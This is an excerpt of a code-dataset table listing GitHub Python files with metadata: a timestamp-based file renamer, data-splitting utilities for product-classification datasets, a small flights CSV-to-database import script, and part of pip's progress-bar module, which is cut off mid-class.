blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
107191d3078278d3565473fa95b4f56689fd46fe | b066aa3489191fe01f65798d9b269df4401d87f5 | /works/renamefiles.py | 3fef1cb7806640a8203e9bc5fe6c69d2c2c0aff8 | [] | no_license | yinzhendong/myworks | 1936826b2e16550f0f7f7c92a9572e75ea3405b7 | 0ec39854a5bc90a5c93227c79eb40224189f1eca | refs/heads/master | 2022-01-29T10:12:35.308744 | 2022-01-12T06:50:43 | 2022-01-12T06:50:43 | 215,003,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | import os, time, random
def renameFiles(path, prefix):
    """Rename every file under `path` (recursively) to `prefix.N.ext`.

    N restarts at 1 in each directory visited by os.walk and the file
    extension is preserved.  Example result: 20200406.1.mp4

    Arguments:
        path   -- directory tree to walk
        prefix -- string prepended to every new file name
    """
    for root, dirs, files in os.walk(path):
        count = 1
        for file in files:
            # get file postfix (extension)
            postfix = file.split('.')[-1]
            # make new file name with prefix and count.
            # example: 20200406.1.mp4
            newfilename = prefix + '.' + str(count) + '.' + postfix
            count += 1
            print(file + '-->' + newfilename)
            # BUG FIX: join with `root` (the directory currently being
            # walked), not the top-level `path`.  The old code raised or
            # clobbered files for anything inside a sub-directory, because
            # the per-directory counter restarts at 1.
            os.rename(os.path.join(root, file), os.path.join(root, newfilename))
# path = '/home/trent/data/temp/'
# path = '/home/trent/data/for'
# Target directory to process (earlier locations kept above for reference).
path = 'D:\\temp\\'
# path = 'D:\\clips\\'
# date = time.strftime('%Y%m%d%H%M%S')
# Use the current timestamp as the file-name prefix, e.g. 20200406103000.
prefix = time.strftime('%Y%m%d%H%M%S')
renameFiles(path, prefix)
| [
"443723640@qq.com"
] | 443723640@qq.com |
3fc066210b8493bb0d40a8279d61d93f4157055a | 602fa0e4ce194d3073d78230c61f7053281f9f9b | /code/python/src/util/data_util.py | b08a962dd0200b383f1b66164fc7b1e43403c0a4 | [] | no_license | ziqizhang/wop | 111cfdda1686a874ff1fc11a453a23fb52d43af1 | ea0c37f444de9f2d5303f74b989f6d1a09feb61d | refs/heads/master | 2022-09-14T20:14:11.575021 | 2021-12-10T21:23:24 | 2021-12-10T21:23:24 | 166,239,995 | 2 | 1 | null | 2022-09-01T23:11:13 | 2019-01-17T14:33:51 | Python | UTF-8 | Python | false | false | 13,037 | py | #read csv data as dataframe, perform stratisfied sampling and output the required sample
import collections
import csv
import json
import pickle
import numpy
import pandas as pd
from sklearn import model_selection
from sklearn.model_selection import train_test_split
#prepare data to fasttext format
def to_fasttext(inCSV, textCol, classCol, outfile):
    """Convert a TSV dataset to fastText's supervised training format.

    Each output line is "__label__<class>\\t<text>".  Classes that occur
    only once are dropped (they cannot be stratified and fastText cannot
    learn from them); the number of dropped rows is printed.

    Arguments:
        inCSV    -- input TSV file (first row is treated as a header)
        textCol  -- zero-based column index of the text
        classCol -- zero-based column index of the class label
        outfile  -- path of the fastText-formatted file to write
    """
    # BUG FIX: .as_matrix() was removed in pandas 1.0 -- .to_numpy() is the
    # supported replacement.  The astype(str) result was previously computed
    # and thrown away, so assign it back to actually apply the cast.
    df = pd.read_csv(inCSV, delimiter="\t", quoting=0, encoding="utf-8"
                     ).to_numpy()
    df = df.astype(str)
    X = df[:, textCol]
    y = df[:, classCol]
    counter = collections.Counter(y)
    single_instance = 0
    with open(outfile, mode='w') as file:
        csvwriter = csv.writer(file, delimiter='\t', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for i in range(len(X)):
            label = y[i]
            if counter[label] == 1:
                # skip singleton classes
                single_instance += 1
                continue
            text = X[i]
            csvwriter.writerow(["__label__" + label, text])
    print(str(single_instance) + " has only one instance and are deleted")
def subset(inCSV, textCol, classCol, outfolder, percentage):
    """Write a stratified random sample of a TSV dataset to `outfolder`.

    Classes with a single instance are removed first (stratified splitting
    needs at least two instances per class).  Two files are produced,
    named after the input file:
      <name>_<percentage>.index -- row indices of the sampled instances
      <name>_<percentage>.tsv   -- "<text>\\t<label>" rows of the sample

    Arguments:
        inCSV      -- input TSV file (first row is treated as a header)
        textCol    -- zero-based column index of the text
        classCol   -- zero-based column index of the class label
        outfolder  -- directory the two output files are written to
        percentage -- fraction of the data to sample, e.g. 0.2
    """
    # BUG FIX: .as_matrix() was removed in pandas 1.0 -- use .to_numpy().
    # Also assign the astype(str) result, which was previously discarded.
    df = pd.read_csv(inCSV, delimiter="\t", quoting=0, encoding="utf-8"
                     ).to_numpy()
    df = df.astype(str)
    X = df[:, textCol]
    y = df[:, classCol]
    counter = collections.Counter(y)
    X_new = []
    y_new = []
    single_instance = 0
    for i in range(len(X)):
        label = y[i]
        if counter[label] == 1:
            single_instance += 1
        else:
            X_new.append(X[i])
            y_new.append(y[i])
    print(str(single_instance) + " has only one instance and are deleted")
    # Stratified split; only the 'test' part (the sample) is written out.
    X_train, X_test, y_train, y_test, \
    indices_train, indices_test = model_selection.train_test_split(
        X_new, y_new, range(len(X_new)), test_size=percentage,
        random_state=0, stratify=y_new)
    # File stem between the last '/' and the '.tsv' suffix of the input path.
    filename = inCSV[inCSV.rfind("/") + 1: inCSV.rfind(".tsv")]
    with open(outfolder + "/" + filename + "_" + str(percentage) + ".index", 'w') as f:
        for i in indices_test:
            f.write(str(i) + "\n")
    with open(outfolder + "/" + filename + "_" + str(percentage) + ".tsv", mode='w') as sample_file:
        csvwriter = csv.writer(sample_file, delimiter='\t', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for i in range(len(X_test)):
            csvwriter.writerow([X_test[i], y_test[i]])
''''
This method reads the json data file (train/val/test) in the SWC2020 mwpd format and save them as a matrix where each
row is an instance with the following columns:
- 0: id
- 1: name
- 2: description
- 3: categorytext
- 4: url
- 5: lvl1
- 6: lvl2
- 7: lvl3
'''
def read_mwpdformat_to_matrix(in_file):
    """Load a SWC2020/MWPD JSON-lines file into a list of rows.

    Each returned row holds, in order:
    id, name, description, category text, url, lvl1, lvl2, lvl3.
    """
    rows = []
    with open(in_file) as fh:
        for raw_line in fh:
            record = json.loads(raw_line)
            rows.append([record['ID'],
                         record['Name'],
                         record['Description'],
                         record['CategoryText'],
                         record['URL'],
                         record['lvl1'],
                         record['lvl2'],
                         record['lvl3']])
    return rows
'''
given the input WDC prod cat GS product offers, and also the train/test set of 2155 clusters
containing product offers derived from this GS, split the GS into train/test containing product offers
based on their cluster membership and the cluster's presence in train/test
'''
def split_wdcGS_by_traintestsplit(train_file, test_file, gs_file,
                                  outfolder):
    """Split the WDC gold-standard product offers into train/test files.

    Offers are routed by cluster membership: an offer whose cluster_id
    appears in `train_file` goes to wdc_gs_train.json, everything else to
    wdc_gs_test.json (both written to `outfolder`, one JSON object per
    line).  Each input file contains a single line holding a JSON array of
    objects with a 'cluster_id' field.
    """
    train_ids = set()
    test_ids = set()
    with open(train_file) as file:
        line = file.readline()
        js = json.loads(line)
        for ent in js:
            # BUG FIX: normalise ids to str when building the sets.  The
            # membership test below uses str(ent['cluster_id']), so storing
            # raw (often int) ids meant nothing ever matched and every
            # offer ended up in the test file.
            train_ids.add(str(ent['cluster_id']))
    with open(test_file) as file:
        line = file.readline()
        js = json.loads(line)
        for ent in js:
            test_ids.add(str(ent['cluster_id']))
    # BUG FIX: the test output was misspelled 'wds_gs_test.json'; later
    # consumers (see the __main__ section) read 'wdc_gs_test.json'.
    # Context managers guarantee both outputs are flushed and closed.
    with open(outfolder + "/wdc_gs_train.json", 'w') as writer_train, \
         open(outfolder + "/wdc_gs_test.json", 'w') as writer_test:
        with open(gs_file) as file:
            line = file.readline()
            js = json.loads(line)
            for ent in js:
                out_line = json.dumps(ent)
                if str(ent['cluster_id']) in train_ids:
                    writer_train.write(out_line + "\n")
                else:
                    writer_test.write(out_line + "\n")
def read_wdcgsformat_to_matrix(in_file):
    """Load the WDC gold-standard JSON-lines file into a list of rows.

    Each returned row holds:
    cluster_id, name, description, brand, manufacturer, url, label.

    The name/description/brand/manufacturer fields are taken from the
    offer's own schema.org properties first, then filled from the parent
    entity's properties for any field that is still empty.  Property
    values appear to be stored with surrounding quote characters, so
    [1:-2] strips them -- TODO confirm against the GS dump format.
    Malformed entries are reported and skipped.
    """
    matrix = []
    with open(in_file) as file:
        line = file.readline()
        while line is not None and len(line) > 0:
            ent = json.loads(line)
            # id, name, desc, brand, manufacturer, url, label
            try:
                row = [ent['cluster_id'], "", "", "", "", ent['url'], ent['categoryLabel']]
                schema_prop = ent['schema.org_properties']
                for d in schema_prop:
                    if '/name' in d.keys():
                        row[1] = d['/name'][1:-2].strip()
                    elif '/description' in d.keys():
                        row[2] = d['/description'][1:-2].strip()
                    elif '/brand' in d.keys():
                        row[3] = d['/brand'][1:-2].strip()
                    elif '/manufacturer' in d.keys():
                        row[4] = d['/manufacturer'][1:-2].strip()
                # Fall back to the parent entity's properties for any field
                # that is still empty.
                schema_prop = ent['parent_schema.org_properties']
                for d in schema_prop:
                    if row[1] == '' and '/name' in d.keys():
                        row[1] = d['/name'][1:-2].strip()
                    elif row[1] == '' and '/title' in d.keys():
                        row[1] = d['/title'][1:-2].strip()
                    elif row[2] == '' and '/description' in d.keys():
                        row[2] = d['/description'][1:-2].strip()
                    elif row[3] == '' and '/brand' in d.keys():
                        row[3] = d['/brand'][1:-2].strip()
                    elif row[4] == '' and '/manufacturer' in d.keys():
                        row[4] = d['/manufacturer'][1:-2].strip()
                matrix.append(row)
            except Exception:
                # BUG FIX: was a bare 'except:', which also swallowed
                # SystemExit and KeyboardInterrupt.
                print("Error encountered")
            line = file.readline()
    return matrix
''''
This method reads the json data file (train/val/test) in the SWC2020 mwpd format and save them as a matrix where each
row is an instance with the following columns:
- 0: ID
- 1: Description.URL
- 2: Brand
- 3: SummaryDescription.LongSummaryDescription
- 4: Title
- 5: Category.CategoryID
- 6: Category.Name.Value
'''
def read_icecatformat_to_matrix(in_file):
    """Load an IceCat JSON-lines file into a list of rows.

    Each returned row holds, in order:
    ID, Description.URL, Brand, SummaryDescription.LongSummaryDescription,
    Title, Category.CategoryID, Category.Name.Value.
    """
    rows = []
    with open(in_file) as fh:
        for raw_line in fh:
            record = json.loads(raw_line)
            rows.append([record['ID'],
                         record['Description.URL'],
                         record['Brand'],
                         record['SummaryDescription.LongSummaryDescription'],
                         record['Title'],
                         record['Category.CategoryID'],
                         record['Category.Name.Value']])
    return rows
''''
This method reads the original training data file for the fakeproductreview dataset
fake_reviews_dataset.csv (download from https://osf.io/3vds7/)
and randomly split it into 80:20 train/test split
'''
def split_fakeproductrev_to_holdout(in_file, out_folder):
    """Randomly split fake_reviews_dataset.csv into an 80:20 train/test
    holdout and write fakeproductrev_train.csv / fakeproductrev_test.csv
    to `out_folder`, each with columns category,rating,text,label.
    The split is reproducible (random_state=42).
    """
    df = pd.read_csv(in_file, header=0, delimiter=",", quoting=0, encoding="utf-8",
                     )
    headers=["category","rating","text","label"]
    X=[]
    for index, row in df.iterrows():
        # Features: columns 0, 1 and 3 of the input row; column 2 is used as
        # the label below.  NOTE(review): this assumes the input column order
        # is category, rating, label, text -- TODO confirm against
        # fake_reviews_dataset.csv (download from https://osf.io/3vds7/).
        r = [row[0], row[1], row[3]]
        X.append(r)
    y = df.iloc[:,2]
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 42)
    y_train = list(y_train)
    y_test=list(y_test)
    # Write the training split: each row is the 3 feature columns plus label.
    outfile=out_folder+"/fakeproductrev_train.csv"
    with open(outfile, 'w', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(headers)
        for i in range(0, len(X_train)):
            r = X_train[i]
            r.append(y_train[i])
            writer.writerow(r)
    # Write the held-out test split in the same format.
    outfile=out_folder+"/fakeproductrev_test.csv"
    with open(outfile, 'w', newline='') as f:
        writer = csv.writer(f)
        writer.writerow(headers)
        for i in range(0, len(X_test)):
            r = X_test[i]
            r.append(y_test[i])
            writer.writerow(r)
def convert_icecatformat_to_json(in_file, out_file):
    """Convert a pickled IceCat pandas DataFrame to a JSON-lines file.

    One JSON object per DataFrame row is written, with NaN values replaced
    by "" (see replace_nan).  Progress is printed every 5000 rows and the
    final row count is printed at the end.

    Arguments:
        in_file  -- pickle file containing a pandas DataFrame indexed by
                    product id
        out_file -- path of the JSON-lines file to write
    """
    count = 0
    # BUG FIX: the output writer was opened manually and never closed if an
    # exception occurred mid-conversion; 'with' guarantees both files are
    # closed and the output is flushed in all cases.
    with open(out_file, "w") as outwriter, open(in_file, 'rb') as f:
        data = pickle.load(f)
        # for h in list(data.columns.values):
        #     print(h)
        for id, row_data in data.iterrows():
            entry = {}
            count += 1
            entry['ID'] = str(id)
            entry['Description.URL'] = replace_nan(row_data['Description.URL'])
            entry['Brand'] = replace_nan(row_data['Brand'])
            entry['SummaryDescription.LongSummaryDescription'] = replace_nan(row_data['SummaryDescription.LongSummaryDescription'])
            entry['Title'] = replace_nan(row_data['Title'])
            entry['Category.CategoryID'] = replace_nan(row_data['Category.CategoryID'])
            entry['Category.Name.Value'] = replace_nan(row_data['Category.Name.Value'])
            outwriter.write(json.dumps(entry) + "\n")
            if count % 5000 == 0:
                print(count)
    print(count)
def replace_nan(v):
    """Return "" when v is a plain float NaN, otherwise return v unchanged.

    Note: deliberately checks `type(v) is float` (not isinstance) so that
    numpy float subclasses are passed through untouched.
    """
    return "" if type(v) is float and numpy.isnan(v) else v
#Brand
#Category.Name.Value
#SummaryDescription.ShortSummaryDescription
#Title
#Description.URL
if __name__ == "__main__":
    # Current task: build the 80:20 holdout for the fake-review dataset.
    split_fakeproductrev_to_holdout("/home/zz/Work/data/wop_productfakerev/fake_reviews_dataset.csv",
                                    "/home/zz/Work/data/wop_productfakerev")
    exit(0)
    # NOTE: everything below is unreachable because of the exit(0) above;
    # it is kept as a scratchpad of earlier one-off conversion runs.
    # train=read_wdcgsformat_to_matrix("/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/wdc_gs_train.json")
    # test=read_wdcgsformat_to_matrix("/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/wdc_gs_test.json")
    # cls = set()
    # for l in train:
    #     cls.add(l[6])
    # print(len(cls))
    # exit(0)
    # train = read_icecatformat_to_matrix(
    #     "/home/zz/Work/data/IceCAT/icecat_data_train.json")
    # val = read_icecatformat_to_matrix(
    #     "/home/zz/Work/data/IceCAT/icecat_data_validate.json")
    # test = read_icecatformat_to_matrix(
    #     "/home/zz/Work/data/IceCAT/icecat_data_test.json")
    #
    # cls = set()
    # for l in train:
    #     cls.add(l[6])
    # print(len(cls))
    # exit(0)
    # Count the distinct lvl1/lvl2/lvl3 labels in the SWC2020 splits.
    train = read_mwpdformat_to_matrix(
        "/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/swc2020/train.json")
    val = read_mwpdformat_to_matrix(
        "/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/swc2020/validation.json")
    test = read_mwpdformat_to_matrix(
        "/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/swc2020/test.json")
    cls1 = set()
    cls2 = set()
    cls3 = set()
    for l in train:
        cls1.add(l[5])
        cls2.add(l[6])
        cls3.add(l[7])
    print(len(cls1))
    exit(0)
    #inCSV="/home/zz/Work/data/Rakuten/rdc-catalog-train.tsv"
    # outfolder="/home/zz/Work/data/Rakuten/"
    # subset(inCSV, 0, 1, outfolder, 0.2)
    #
    # inCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-gold.tsv"
    # outfolder = "/home/zz/Work/data/Rakuten/"
    # subset(inCSV, 0, 1, outfolder, 0.2)
    # inCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-train.tsv"
    # outCSV="/home/zz/Work/data/Rakuten/rdc-catalog-train_fasttext.tsv"
    # to_fasttext(inCSV,0,1,outCSV)
    #
    # inCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-gold.tsv"
    # outCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-gold_fasttext.tsv"
    # to_fasttext(inCSV, 0, 1, outCSV)
    #categories_clusters_testing.json
    # read_wdcformat_to_matrix("/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_clusters_training.json")
    # print("end")
    # split_wdcGS_by_traintestsplit('/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_clusters_training.json',
    #                               '/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_clusters_testing.json',
    #                               '/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_gold_standard_offers.json',
    #                               '/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS')
    convert_icecatformat_to_json("/home/zz/Work/data/IceCAT/icecat_data_validate.pkl",
                                 "/home/zz/Work/data/IceCAT/icecat_data_validate.json")
#read_icecatformat_to_matrx("/home/zz/Work/data/IceCAT/icecat_data_test_target.pkl") | [
"ziqizhang.email@gmail.com"
] | ziqizhang.email@gmail.com |
2bf6975be2364368e2cde8343d00d2f3ef6bec03 | a571488aa7a5027e0ed466081e30cb18469f98f9 | /(Pre-July) 4. SQL/import.py | 8423c46a37fa976b2b0214c49e32e0d134c06d17 | [] | no_license | DeetoMok/CS50 | f8d84105344ec256fdbecf96fb72b7bdf5c8bd96 | 4ad932bfd910a6b9602d4754a495f202c9bc9ecf | refs/heads/master | 2023-02-02T08:21:08.350081 | 2020-12-20T12:29:03 | 2020-12-20T12:29:03 | 286,779,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | import csv
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
# Database connection: DATABASE_URL must be set in the environment,
# e.g. postgres://user:pass@host/dbname.
engine = create_engine(os.getenv("DATABASE_URL"))
# scoped_session gives each thread its own session bound to the engine.
db = scoped_session(sessionmaker(bind=engine))
def main():
    """Load flights.csv into the flights table, one row per CSV line."""
    # BUG FIX: the filename must be a string literal (it was a bare name,
    # a NameError); the reader variable was assigned to 'render' while the
    # loop iterated 'reader' (another NameError); and the final print
    # referenced an undefined 'duration' instead of 'dur'.  A 'with' block
    # also guarantees the CSV file is closed.
    with open("flights.csv") as f:
        reader = csv.reader(f)
        # Where col 1 is origin, col 2 is destination, col 3 is duration.
        for o, dest, dur in reader:
            # :origin is a placeholder for origin, since the value is not yet known
            db.execute("INSERT INTO flights(origin, destination, duration) VALUES (:origin, :destination, :duration)",
                       {"origin": o, "destination": dest, "duration": dur})
            # The dict tells each placeholder what to substitute, taken from the reader.
            print(f"Added flight from {o} to {dest} lasting {dur}")
    db.commit()
if __name__ == "__main__":
main() | [
"54903425+DeetoMok@users.noreply.github.com"
] | 54903425+DeetoMok@users.noreply.github.com |
72f8181b7c4daaf75a65c514a5d3b2a6004cb679 | f8972963bc77887221f900209b417915c7920747 | /venv/lib/python3.6/site-packages/pip-10.0.1-py3.6.egg/pip/_internal/utils/ui.py | d7b3de8c0d7fbd55441ba19daede31ad778a0459 | [] | no_license | patilmanojk/UpGradProHackathonTeamTechPals | 3b35a9eaa9fb84ccd3579bd938c240169412da34 | 6bedd9e997089c5ca47709e072f6651b89faafa3 | refs/heads/master | 2020-07-28T05:51:40.672852 | 2019-09-26T19:24:45 | 2019-09-26T19:24:45 | 209,329,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,056 | py | from __future__ import absolute_import, division
import contextlib
import itertools
import logging
import sys
import time
from signal import SIGINT, default_int_handler, signal
from pip._internal.compat import WINDOWS
from pip._internal.utils.logging import get_indentation
from pip._internal.utils.misc import format_size
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._vendor import six
from pip._vendor.progress.bar import (
Bar, ChargingBar, FillingCirclesBar, FillingSquaresBar, IncrementalBar,
ShadyBar,
)
from pip._vendor.progress.helpers import HIDE_CURSOR, SHOW_CURSOR, WritelnMixin
from pip._vendor.progress.spinner import Spinner
if MYPY_CHECK_RUNNING:
from typing import Any
try:
from pip._vendor import colorama
# Lots of different errors can come from this, including SystemError and
# ImportError.
except Exception:
colorama = None
logger = logging.getLogger(__name__)
def _select_progress_class(preferred, fallback):
    """Return *preferred* if its output stream can encode every character
    the bar will draw; otherwise return the plain-ASCII *fallback*."""
    file_encoding = getattr(preferred.file, "encoding", None)

    # With no known encoding we assume the stream cannot handle unicode
    # and settle for the ASCII bar.
    if not file_encoding:
        return fallback

    # Gather every character the fancy bar might print: the fill
    # characters plus any animation phases.
    glyphs = [
        getattr(preferred, "empty_fill", six.text_type()),
        getattr(preferred, "fill", six.text_type()),
    ]
    glyphs.extend(getattr(preferred, "phases", []))

    # If all of those characters survive encoding to the stream's charset,
    # the fancy bar is usable; otherwise fall back to plain text.
    try:
        six.text_type().join(glyphs).encode(file_encoding)
    except UnicodeEncodeError:
        return fallback
    return preferred
# Pick the fanciest bar class the attached output stream can actually render.
_BaseBar = _select_progress_class(IncrementalBar, Bar)  # type: Any
class InterruptibleMixin(object):
    """
    Helper to ensure that self.finish() gets called on keyboard interrupt.
    This allows downloads to be interrupted without leaving temporary state
    (like hidden cursors) behind.
    This class is similar to the progress library's existing SigIntMixin
    helper, but as of version 1.2, that helper has the following problems:
    1. It calls sys.exit().
    2. It discards the existing SIGINT handler completely.
    3. It leaves its own handler in place even after an uninterrupted finish,
       which will have unexpected delayed effects if the user triggers an
       unrelated keyboard interrupt some time after a progress-displaying
       download has already completed, for example.
    """
    def __init__(self, *args, **kwargs):
        """
        Save the original SIGINT handler for later.
        """
        super(InterruptibleMixin, self).__init__(*args, **kwargs)
        # Install our handler and remember whatever handler was there before,
        # so finish() can put it back.
        self.original_handler = signal(SIGINT, self.handle_sigint)
        # If signal() returns None, the previous handler was not installed from
        # Python, and we cannot restore it. This probably should not happen,
        # but if it does, we must restore something sensible instead, at least.
        # The least bad option should be Python's default SIGINT handler, which
        # just raises KeyboardInterrupt.
        if self.original_handler is None:
            self.original_handler = default_int_handler
    def finish(self):
        """
        Restore the original SIGINT handler after finishing.
        This should happen regardless of whether the progress display finishes
        normally, or gets interrupted.
        """
        super(InterruptibleMixin, self).finish()
        signal(SIGINT, self.original_handler)
    def handle_sigint(self, signum, frame):
        """
        Call self.finish() before delegating to the original SIGINT handler.
        This handler should only be in place while the progress display is
        active.
        """
        self.finish()
        self.original_handler(signum, frame)
class SilentBar(Bar):
    # A bar that renders nothing; used when progress display is turned off.
    def update(self):
        pass
class BlueEmojiBar(IncrementalBar):
    # Progress bar drawn with blue emoji glyphs (requires unicode output).
    suffix = "%(percent)d%%"
    bar_prefix = " "
    bar_suffix = " "
    phases = (u"\U0001F539", u"\U0001F537", u"\U0001F535") # type: Any
class DownloadProgressMixin(object):
    """Mixin adding download-oriented fields (downloaded size, speed, ETA)
    for use in a progress bar's message/suffix templates."""
    def __init__(self, *args, **kwargs):
        super(DownloadProgressMixin, self).__init__(*args, **kwargs)
        # Indent the message so it lines up with pip's log output.
        self.message = (" " * (get_indentation() + 2)) + self.message
    @property
    def downloaded(self):
        # Human-readable count of bytes downloaded so far.
        return format_size(self.index)
    @property
    def download_speed(self):
        # Avoid zero division errors...
        if self.avg == 0.0:
            return "..."
        return format_size(1 / self.avg) + "/s"
    @property
    def pretty_eta(self):
        # Empty string when no ETA is available yet.
        if self.eta:
            return "eta %s" % self.eta_td
        return ""
    def iter(self, it, n=1):
        # Wrap an iterable: advance the display by n per item and finish
        # the display when the iterable is exhausted.
        for x in it:
            yield x
            self.next(n)
        self.finish()
class WindowsMixin(object):
    """Mixin that adapts progress output for the Windows console (no ANSI
    cursor codes; route writes through colorama when available)."""
    def __init__(self, *args, **kwargs):
        # The Windows terminal does not support the hide/show cursor ANSI codes
        # even with colorama. So we'll ensure that hide_cursor is False on
        # Windows.
        # This call needs to go before the super() call, so that hide_cursor
        # is set in time. The base progress bar class writes the "hide cursor"
        # code to the terminal in its init, so if we don't set this soon
        # enough, we get a "hide" with no corresponding "show"...
        if WINDOWS and self.hide_cursor:
            self.hide_cursor = False
        super(WindowsMixin, self).__init__(*args, **kwargs)
        # Check if we are running on Windows and we have the colorama module,
        # if we do then wrap our file with it.
        if WINDOWS and colorama:
            self.file = colorama.AnsiToWin32(self.file)
            # The progress code expects to be able to call self.file.isatty()
            # but the colorama.AnsiToWin32() object doesn't have that, so we'll
            # add it.
            self.file.isatty = lambda: self.file.wrapped.isatty()
            # The progress code expects to be able to call self.file.flush()
            # but the colorama.AnsiToWin32() object doesn't have that, so we'll
            # add it.
            self.file.flush = lambda: self.file.wrapped.flush()
class BaseDownloadProgressBar(WindowsMixin, InterruptibleMixin,
                              DownloadProgressMixin):
    # Common configuration shared by every download progress bar style below.
    file = sys.stdout
    message = "%(percent)d%%"
    suffix = "%(downloaded)s %(download_speed)s %(pretty_eta)s"
# NOTE: The "type: ignore" comments on the following classes are there to
# work around https://github.com/python/typing/issues/241
# Each class below pairs the shared download-bar behaviour with one of the
# vendored progress library's rendering styles.
class DefaultDownloadProgressBar(BaseDownloadProgressBar,
                                 _BaseBar): # type: ignore
    pass
class DownloadSilentBar(BaseDownloadProgressBar, SilentBar): # type: ignore
    pass
class DownloadIncrementalBar(BaseDownloadProgressBar, # type: ignore
                             IncrementalBar):
    pass
class DownloadChargingBar(BaseDownloadProgressBar, # type: ignore
                          ChargingBar):
    pass
class DownloadShadyBar(BaseDownloadProgressBar, ShadyBar): # type: ignore
    pass
class DownloadFillingSquaresBar(BaseDownloadProgressBar, # type: ignore
                                FillingSquaresBar):
    pass
class DownloadFillingCirclesBar(BaseDownloadProgressBar, # type: ignore
                                FillingCirclesBar):
    pass
class DownloadBlueEmojiProgressBar(BaseDownloadProgressBar, # type: ignore
                                   BlueEmojiBar):
    pass
class DownloadProgressSpinner(WindowsMixin, InterruptibleMixin,
                              DownloadProgressMixin, WritelnMixin, Spinner):
    """Spinner used when the total download size is unknown; shows the
    bytes downloaded so far and the current speed."""
    file = sys.stdout
    suffix = "%(downloaded)s %(download_speed)s"
    def next_phase(self):
        # Lazily build and then cycle through the spinner's animation frames.
        if not hasattr(self, "_phaser"):
            self._phaser = itertools.cycle(self.phases)
        return next(self._phaser)
    def update(self):
        # Render "message frame suffix", skipping separators for empty parts.
        message = self.message % self
        phase = self.next_phase()
        suffix = self.suffix % self
        line = ''.join([
            message,
            " " if message else "",
            phase,
            " " if suffix else "",
            suffix,
        ])
        self.writeln(line)
# Maps the --progress-bar option value to a (bar class, spinner class) pair;
# the bar is used when the total size is known, the spinner otherwise.
BAR_TYPES = {
    "off": (DownloadSilentBar, DownloadSilentBar),
    "on": (DefaultDownloadProgressBar, DownloadProgressSpinner),
    "ascii": (DownloadIncrementalBar, DownloadProgressSpinner),
    "pretty": (DownloadFillingCirclesBar, DownloadProgressSpinner),
    "emoji": (DownloadBlueEmojiProgressBar, DownloadProgressSpinner)
}
def DownloadProgressProvider(progress_bar, max=None):
    # Return the .iter wrapper of the right renderer: a spinner when the
    # total size (max) is unknown or zero, a real progress bar otherwise.
    if max is None or max == 0:
        return BAR_TYPES[progress_bar][1]().iter
    else:
        return BAR_TYPES[progress_bar][0](max=max).iter
################################################################
# Generic "something is happening" spinners
#
# We don't even try using progress.spinner.Spinner here because it's actually
# simpler to reimplement from scratch than to coerce their code into doing
# what we need.
################################################################
@contextlib.contextmanager
def hidden_cursor(file):
    """Context manager that hides the terminal cursor while the body runs
    and always restores it afterwards (when supported)."""
    # The Windows terminal does not support the hide/show cursor ANSI codes,
    # even via colorama. So don't even try.
    if WINDOWS:
        yield
    # We don't want to clutter the output with control characters if we're
    # writing to a file, or if the user is running with --quiet.
    # See https://github.com/pypa/pip/issues/3418
    elif not file.isatty() or logger.getEffectiveLevel() > logging.INFO:
        yield
    else:
        file.write(HIDE_CURSOR)
        try:
            yield
        finally:
            # Restore the cursor even if the body raised.
            file.write(SHOW_CURSOR)
class RateLimiter(object):
    """Simple wall-clock throttle.

    ready() reports whether at least the configured interval has elapsed
    since the last reset(); callers reset() after doing rate-limited work.
    """
    def __init__(self, min_update_interval_seconds):
        self._min_update_interval_seconds = min_update_interval_seconds
        self._last_update = 0

    def ready(self):
        # True once the minimum interval has passed since the last reset.
        elapsed = time.time() - self._last_update
        return elapsed >= self._min_update_interval_seconds

    def reset(self):
        # Record "now" as the time of the most recent update.
        self._last_update = time.time()
class InteractiveSpinner(object):
    """Animated one-line spinner for interactive terminals.
    Writes "<message> ... <frame>" to the file, updating the frame at most
    ~8 times/second, and replaces the frame with a final status string when
    finish() is called."""
    def __init__(self, message, file=None, spin_chars="-\\|/",
                 # Empirically, 8 updates/second looks nice
                 min_update_interval_seconds=0.125):
        self._message = message
        if file is None:
            file = sys.stdout
        self._file = file
        self._rate_limiter = RateLimiter(min_update_interval_seconds)
        self._finished = False
